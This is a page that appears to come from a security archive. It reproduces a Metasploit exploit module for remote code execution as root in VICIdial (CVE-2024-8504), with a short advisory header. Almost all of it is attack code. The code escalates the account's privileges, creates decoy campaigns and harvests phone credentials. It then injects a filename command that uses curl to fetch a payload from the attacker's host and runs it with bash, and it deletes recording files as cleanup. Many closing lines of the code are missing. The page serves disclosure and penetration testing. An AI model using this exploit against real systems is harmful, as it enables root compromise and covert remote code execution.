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VICIdial Authenticated Remote Code Execution

VICIdial Authenticated Remote Code Execution
Posted Oct 1, 2024
Authored by Valentin Lobstein, Jaggar Henry | Site metasploit.com

An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective.

tags | exploit, arbitrary, shell, root
advisories | CVE-2024-8504
SHA-256 | 2328f6faa4b6ae3ca330a27bb8694e1604bd747c455740abb7e147c4bd02a379

VICIdial Authenticated Remote Code Execution

Change Mirror Download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
prepend Msf::Exploit::Remote::AutoCheck

Rank = ExcellentRanking

def initialize(info = {})
'Name' => 'VICIdial Authenticated Remote Code Execution',
'Description' => %q{
An attacker with authenticated access to VICIdial as an "agent"
can execute arbitrary shell commands as the "root" user. This
attack can be chained with CVE-2024-8503 to execute arbitrary
shell commands starting from an unauthenticated perspective.
'Author' => [
'Valentin Lobstein', # Metasploit Module
'Jaggar Henry of KoreLogic, Inc.' # Vulnerability Discovery
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-8504'],
['URL', 'https://korelogic.com/Resources/Advisories/KL-001-2024-012.txt']
'DisclosureDate' => '2024-09-10',
'Platform' => %w[unix linux],
'Arch' => %w[ARCH_CMD],
'Targets' => [
'Unix/Linux Command Shell', {
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD,
'Privileged' => true
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
'DefaultTarget' => 0,
'DefaultOptions' => {
'WfsDelay' => 300,
'SRVPORT' => 5000 # To not have conflict with FETCH_SRVPORT (both are needed for this exploit to work)
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION]

OptString.new('USERNAME', [true, 'Administrator username']),
OptString.new('PASSWORD', [true, 'Administrator password']),

def check
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vicidial.php'),
'method' => 'GET'

return CheckCode::Unknown unless res&.code == 200

html_doc = res.get_html_document

version_info = html_doc.at_xpath("//td[contains(text(), 'VERSION:')]")&.text ||
res.body.split("\n").find { |line| line.include?('VERSION:') }

return CheckCode::Unknown unless version_info

extracted_version = version_info.scan(/VERSION:\s*(\d+\.\d+)-(\d+)/).flatten.join('-')

return CheckCode::Unknown if extracted_version.empty?

print_status("VICIdial version: #{extracted_version}")

vulnerable_version = Rex::Version.new('2.14-917a')
current_version = Rex::Version.new(extracted_version)

return current_version <= vulnerable_version ? CheckCode::Vulnerable : CheckCode::Safe

def exploit
# Start the HTTP server to handle incoming requests from the payload
print_status('Server started.')

# Add the resource to serve the payload and prepare the listener

# Authenticate as an administrator using provided credentials
target_uri, request_headers = authenticate_admin

# Elevate user privileges by updating user settings
update_user_settings(target_uri, request_headers)

# Update the system settings for further exploitation
update_system_settings(target_uri, request_headers)

# Create a dummy campaign to act as a decoy during the attack
fake_company_name, fake_campaign_id, fake_list_id, fake_list_name = create_dummy_campaign(target_uri, request_headers)

# Modify the settings of the newly created dummy campaign
update_campaign_settings(target_uri, request_headers, fake_company_name, fake_campaign_id)

# Create a dummy list associated with the dummy campaign
create_dummy_list(target_uri, request_headers, fake_list_name, fake_campaign_id, fake_list_id)

# Retrieve phone credentials (extension and password) to authenticate as an agent
phone_extension, phone_password, recording_extension = fetch_phone_credentials(target_uri, request_headers)

# Authenticate to the agent portal using the retrieved phone credentials and campaign ID
session_name, session_id = agent_portal_authentication(request_headers, phone_extension, phone_password, fake_campaign_id)

# Insert a malicious recording that contains the payload, using the agent session
insert_malicious_recording(request_headers, session_name, session_id, recording_extension)

# Clean up by deleting the campaign created earlier
delete_dummy_campaign(target_uri, request_headers, fake_campaign_id)

# Start the cron job to execute the malicious payload

def primer
add_resource('Path' => '/', 'Proc' => proc { |cli, req| on_request_uri_payload(cli, req) })
print_status('Payload is ready at /')

def on_request_uri_payload(cli, request)
bash_command = <<-BASH
rm -- $(readlink /proc/$$/fd/255)
cd /var/spool/asterisk/monitor/
find . -maxdepth 1 -type f -delete

handle_request(cli, request, bash_command)

def handle_request(cli, request, response_payload)
print_status("Received request at: #{request.uri} - Client Address: #{cli.peerhost}")

case request.uri
when '/'
print_status("Sending response to #{cli.peerhost} for /")
send_response(cli, response_payload)
print_error("Request for unknown resource: #{request.uri}")

def delete_dummy_campaign(target_uri, request_headers, campaign_id)
print_status("Deleting dummy campaign with ID: #{campaign_id}")

res = send_request_cgi({
'uri' => normalize_uri(target_uri, 'vicidial', 'admin.php'),
'method' => 'GET',
'vars_get' => { 'ADD' => '61', 'campaign_id' => campaign_id, 'CoNfIrM' => 'YES' },
'headers' => request_headers

res&.code == 200 ? print_good("Campaign #{campaign_id} deleted successfully.") : print_error("Failed to delete campaign #{campaign_id}.")

def authenticate_admin
username = datastore['USERNAME']
password = datastore['PASSWORD']

credentials = "#{username}:#{password}"
credentials_base64 = Rex::Text.encode_base64(credentials)
auth_header = "Basic #{credentials_base64}"

target_uri = normalize_uri(datastore['TARGETURI'], 'vicidial', 'admin.php')
request_params = { 'ADD' => '3', 'user' => username }
request_headers = { 'Authorization' => auth_header }

res = send_request_cgi(
'uri' => target_uri,
'method' => 'GET',
'vars_get' => request_params,
'headers' => request_headers,
'keep_cookies' => true

fail_with(Failure::UnexpectedReply, 'Failed to authenticate with credentials. Maybe hashing is enabled?') unless res&.code == 200

print_good("Authenticated successfully as user '#{username}'")
[target_uri, request_headers]

def update_user_settings(target_uri, request_headers)
faker = Faker::Internet

user_settings_body = {
'ADD' => '4A', 'custom_fields_modify' => '0', 'user' => datastore['USERNAME'], 'DB' => '0',
'pass' => datastore['PASSWORD'], 'force_change_password' => 'N', 'full_name' => Faker::Name.name,
'user_level' => '9', 'user_group' => 'ADMIN', 'phone_login' => faker.username, 'phone_pass' => faker.password,
'active' => 'Y', 'user_new_lead_limit' => '-1', 'agent_choose_ingroups' => '1',
'agent_choose_blended' => '1', 'hotkeys_active' => '0', 'scheduled_callbacks' => '1',
'agentonly_callbacks' => '0', 'next_dial_my_callbacks' => 'NOT_ACTIVE', 'agentcall_manual' => '0',
'manual_dial_filter' => 'DISABLED', 'agentcall_email' => '0', 'agentcall_chat' => '0',
'vicidial_recording' => '1', 'vicidial_transfers' => '1', 'closer_default_blended' => '0',
'user_choose_language' => '0', 'selected_language' => 'default+English', 'vicidial_recording_override' => 'DISABLED',
'mute_recordings' => 'DISABLED', 'alter_custdata_override' => 'NOT_ACTIVE',
'alter_custphone_override' => 'NOT_ACTIVE', 'agent_shift_enforcement_override' => 'ALL',
'agent_call_log_view_override' => 'Y', 'hide_call_log_info' => 'Y', 'agent_lead_search' => 'NOT_ACTIVE',
'lead_filter_id' => 'NONE', 'user_hide_realtime' => '0', 'allow_alerts' => '0',
'preset_contact_search' => 'NOT_ACTIVE', 'max_inbound_calls' => '0', 'max_inbound_filter_enabled' => '0',
'max_inbound_filter_min_sec' => '-1', 'inbound_credits' => '-1', 'max_hopper_calls' => '0',
'max_hopper_calls_hour' => '0', 'wrapup_seconds_override' => '-1', 'ready_max_logout' => '-1',
'qc_enabled' => '0', 'qc_user_level' => '1', 'qc_pass' => '0', 'qc_finish' => '0',
'qc_commit' => '0', 'hci_enabled' => '0', 'realtime_block_user_info' => '0',
'admin_hide_lead_data' => '0', 'admin_hide_phone_data' => '0', 'ignore_group_on_search' => '0',
'view_reports' => '1', 'access_recordings' => '0', 'alter_agent_interface_options' => '1',
'modify_users' => '1', 'change_agent_campaign' => '1', 'delete_users' => '1',
'modify_usergroups' => '1', 'delete_user_groups' => '1', 'modify_lists' => '1',
'delete_lists' => '1', 'load_leads' => '1', 'modify_leads' => '1', 'export_gdpr_leads' => '0',
'download_lists' => '1', 'export_reports' => '1', 'delete_from_dnc' => '1',
'modify_campaigns' => '1', 'campaign_detail' => '1', 'modify_dial_prefix' => '1',
'delete_campaigns' => '1', 'modify_ingroups' => '1', 'delete_ingroups' => '1',
'modify_inbound_dids' => '1', 'delete_inbound_dids' => '1', 'modify_custom_dialplans' => '1',
'modify_remoteagents' => '1', 'delete_remote_agents' => '1', 'modify_scripts' => '1',
'delete_scripts' => '1', 'modify_filters' => '1', 'delete_filters' => '1',
'ast_admin_access' => '1', 'ast_delete_phones' => '1', 'modify_call_times' => '1',
'delete_call_times' => '1', 'modify_servers' => '1', 'modify_shifts' => '1',
'modify_phones' => '1', 'modify_carriers' => '1', 'modify_email_accounts' => '0',
'modify_labels' => '1', 'modify_colors' => '1', 'modify_languages' => '0',
'modify_statuses' => '1', 'modify_voicemail' => '1', 'modify_audiostore' => '1',
'modify_moh' => '1', 'modify_tts' => '1', 'modify_contacts' => '1', 'callcard_admin' => '1',
'modify_auto_reports' => '0', 'add_timeclock_log' => '1', 'modify_timeclock_log' => '1',
'delete_timeclock_log' => '1', 'manager_shift_enforcement_override' => '1',
'pause_code_approval' => '1', 'admin_cf_show_hidden' => '0', 'modify_ip_lists' => '0',
'ignore_ip_list' => '0', 'two_factor_override' => 'NOT_ACTIVE', 'vdc_agent_api_access' => '1',
'api_list_restrict' => '0', 'api_allowed_functions%5B%5D' => 'ALL_FUNCTIONS',
'api_only_user' => '0', 'modify_same_user_level' => '1', 'download_invalid_files' => '1',
'alter_admin_interface_options' => '1', 'SUBMIT' => 'SUBMIT'

'uri' => target_uri,
'method' => 'POST',
'headers' => request_headers,
'vars_post' => user_settings_body,
'keep_cookies' => true

print_good('Updated user settings to increase privileges')

def update_system_settings(target_uri, request_headers)
res = send_request_cgi(
'uri' => target_uri,
'method' => 'GET',
'headers' => request_headers,
'vars_get' => { 'ADD' => Rex::Text.rand_text_numeric(10, 15) },
'keep_cookies' => true
fail_with(Failure::NotFound, 'Failed to fetch system settings') unless res

system_settings_body = {}
res.get_html_document.css('input').each do |input_tag|
system_settings_body[input_tag['name']] = input_tag['value']

res.get_html_document.css('select').each do |select_tag|
selected_tag = select_tag.at_css('option[selected]')
next unless selected_tag

system_settings_body[select_tag['name']] = selected_tag.text

system_settings_body['outbound_autodial_active'] = '0'

'uri' => target_uri,
'method' => 'POST',
'headers' => request_headers,
'vars_post' => system_settings_body,
'keep_cookies' => true

print_good('Updated system settings')

def create_dummy_campaign(target_uri, request_headers)
fake_company_name = Faker::Company.name
fake_campaign_id = Faker::Number.number(digits: 6).to_i
fake_list_id = fake_campaign_id + 1
fake_list_name = "#{fake_company_name} List"

campaign_settings_body = {
'ADD' => '21',
'campaign_id' => fake_campaign_id,
'campaign_name' => fake_company_name,
'user_group' => '---ALL---',
'active' => 'Y',
'allow_closers' => 'Y',
'hopper_level' => '1',
'next_agent_call' => 'random',
'local_call_time' => '12am-12am',
'get_call_launch' => 'NONE',

'uri' => target_uri,
'method' => 'POST',
'headers' => request_headers,
'vars_post' => campaign_settings_body,
'keep_cookies' => true

print_good("Created dummy campaign '#{fake_company_name}'")
[fake_company_name, fake_campaign_id, fake_list_id, fake_list_name]

def update_campaign_settings(target_uri, request_headers, fake_company_name, fake_campaign_id)
update_campaign_body = {
'ADD' => '41',
'campaign_id' => fake_campaign_id,
'old_campaign_allow_inbound' => 'Y',
'campaign_name' => fake_company_name,
'active' => 'Y',
'lead_order' => 'DOWN',
'lead_filter_id' => 'NONE',
'no_hopper_leads_logins' => 'Y',
'hopper_level' => '1',
'reset_hopper' => 'N',
'dial_method' => 'RATIO',
'auto_dial_level' => '1',
'form_end' => 'END'

'uri' => target_uri,
'method' => 'POST',
'headers' => request_headers,
'vars_post' => update_campaign_body,
'keep_cookies' => true

print_good('Updated dummy campaign settings')

def create_dummy_list(target_uri, request_headers, fake_list_name, fake_campaign_id, fake_list_id)
list_settings_body = {
'ADD' => '211',
'list_id' => fake_list_id,
'list_name' => fake_list_name,
'campaign_id' => fake_campaign_id,
'active' => 'Y',

'uri' => target_uri,
'method' => 'POST',
'headers' => request_headers,
'vars_post' => list_settings_body,
'keep_cookies' => true

print_good("Created dummy list '#{fake_list_name}' for campaign '#{fake_campaign_id}'")

def fetch_phone_credentials(target_uri, request_headers)
res = send_request_cgi(
'uri' => target_uri,
'method' => 'GET',
'headers' => request_headers,
'vars_get' => { 'ADD' => '10000000000' },
'keep_cookies' => true
fail_with(Failure::NotFound, 'Failed to fetch phone credentials') unless res

phone_uri_path = res.get_html_document.at_css('a:contains("MODIFY")')&.get_attribute('href')
fail_with(Failure::NotFound, 'Failed to find the "MODIFY" link in the phone credentials page') unless phone_uri_path

res = send_request_cgi(
'uri' => normalize_uri(datastore['TARGETURI'], phone_uri_path),
'method' => 'GET',
'headers' => request_headers,
'keep_cookies' => true
fail_with(Failure::NotFound, 'Failed to fetch phone credentials page') unless res

phone_extension = res.get_html_document.at_css('input[name="extension"]')&.get_attribute('value')
phone_password = res.get_html_document.at_css('input[name="pass"]')&.get_attribute('value')
recording_extension = res.get_html_document.at_css('input[name="recording_exten"]')&.get_attribute('value')

if [phone_extension, phone_password, recording_extension].all?
print_good("Found phone credentials: Extension=#{phone_extension}, Password=#{phone_password}, Recording Extension=#{recording_extension}")
fail_with(Failure::NotFound, 'Failed to retrieve one or more phone credentials from the page')

[phone_extension, phone_password, recording_extension]

def agent_portal_authentication(request_headers, phone_extension, phone_password, fake_campaign_id)
vdc_db_query_body = {
'user' => datastore['USERNAME'],
'pass' => datastore['PASSWORD'],
'ACTION' => 'LogiNCamPaigns',
'format' => 'html'

res = send_request_cgi(
'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vdc_db_query.php'),
'method' => 'POST',
'vars_post' => vdc_db_query_body,
'keep_cookies' => true
fail_with(Failure::NotFound, 'Failed to retrieve hidden input fields') unless res

doc = res.get_html_document
mgr_login_name = doc.at_css('input[name^="MGR_login"]')&.get_attribute('name')
mgr_pass_name = doc.at_css('input[name^="MGR_pass"]')&.get_attribute('name')

if mgr_login_name && mgr_pass_name
print_good("Retrieved dynamic field names: #{mgr_login_name}, #{mgr_pass_name}")
today_date = Time.now.strftime('%Y%m%d')
mgr_login_name = "MGR_login#{today_date}"
mgr_pass_name = "MGR_pass#{today_date}"
print_status("Constructed dynamic field names manually: #{mgr_login_name}, #{mgr_pass_name}")

manager_login_body = {
'DB' => '0',
'JS_browser_height' => '1313',
'JS_browser_width' => '2560',
'phone_login' => phone_extension,
'phone_pass' => phone_password,
'VD_login' => datastore['USERNAME'],
'VD_pass' => datastore['PASSWORD'],
'MGR_override' => '1',
'relogin' => 'YES',
mgr_login_name => datastore['USERNAME'],
mgr_pass_name => datastore['PASSWORD'],

'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vicidial.php'),
'method' => 'POST',
'headers' => request_headers,
'vars_post' => manager_login_body,
'keep_cookies' => true

print_good('Entered "manager" credentials to override shift enforcement')

agent_login_body = {
'DB' => '0',
'JS_browser_height' => '1313',
'JS_browser_width' => '2560',
'phone_login' => phone_extension,
'phone_pass' => phone_password,
'VD_login' => datastore['USERNAME'],
'VD_pass' => datastore['PASSWORD'],
'VD_campaign' => fake_campaign_id

res = send_request_cgi(
'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vicidial.php'),
'method' => 'POST',
'headers' => request_headers,
'vars_post' => agent_login_body

print_good('Authenticated as agent using phone credentials')

session_name_match = res.body.match(/var\s+session_name\s*=\s*'([a-zA-Z0-9_]+)';/)
session_id_match = res.body.match(/var\s+session_id\s*=\s*'([0-9]+)';/)

if session_name_match && session_id_match
session_name = session_name_match[1]
session_id = session_id_match[1]
print_good("Session Name: #{session_name}, Session ID: #{session_id}")
fail_with(Failure::NotFound, 'Failed to retrieve session information')

[session_name, session_id]

def insert_malicious_recording(request_headers, session_name, session_id, recording_extension)
uri = get_uri.gsub(%r{^https?://}, '').chomp('/')
random_filename = ".#{Rex::Text.rand_text_alphanumeric(rand(3..5))}"
malicious_filename = "$(curl$IFS-k$IFS@#{uri}$IFS-o$IFS#{random_filename}&&bash$IFS#{random_filename})"
print_status("Generated malicious command: #{malicious_filename}")

record1_body = {
'server_ip' => datastore['RHOSTS'],
'session_name' => session_name,
'user' => datastore['USERNAME'],
'pass' => datastore['PASSWORD'],
'ACTION' => 'MonitorConf',
'format' => 'text',
'channel' => "Local/#{recording_extension}@default",
'filename' => malicious_filename,
'exten' => recording_extension,
'ext_context' => 'default',
'ext_priority' => '1',
'FROMvdc' => 'YES',
'FROMapi' => ''

res = send_request_cgi(
'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'manager_send.php'),
'method' => 'POST',
'headers' => request_headers,
'vars_post' => record1_body,
'keep_cookies' => true

recording_id_match = res.body.match(/RecorDing_ID: ([0-9]+)/)
if recording_id_match
recording_id = recording_id_match[1]
fail_with(Failure::Unknown, 'Failed to get recording ID')

record2_body = {
'server_ip' => datastore['RHOSTS'],
'session_name' => session_name,
'user' => datastore['USERNAME'],
'pass' => datastore['PASSWORD'],
'ACTION' => 'StopMonitorConf',
'format' => 'text',
'channel' => "Local/#{recording_extension}@default",
'filename' => "ID:#{recording_id}",
'exten' => session_id,
'ext_context' => 'default',
'ext_priority' => '1',
'FROMvdc' => 'YES',
'FROMapi' => ''

'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'conf_exten_check.php'),
'method' => 'POST',
'headers' => request_headers,
'vars_post' => record2_body,
'keep_cookies' => true

print_good('Stopped malicious recording to prevent file size from growing')

def wait_for_cron_job
print_status("Waiting for #{datastore['WfsDelay']} seconds to allow the cron job to execute the payload...")
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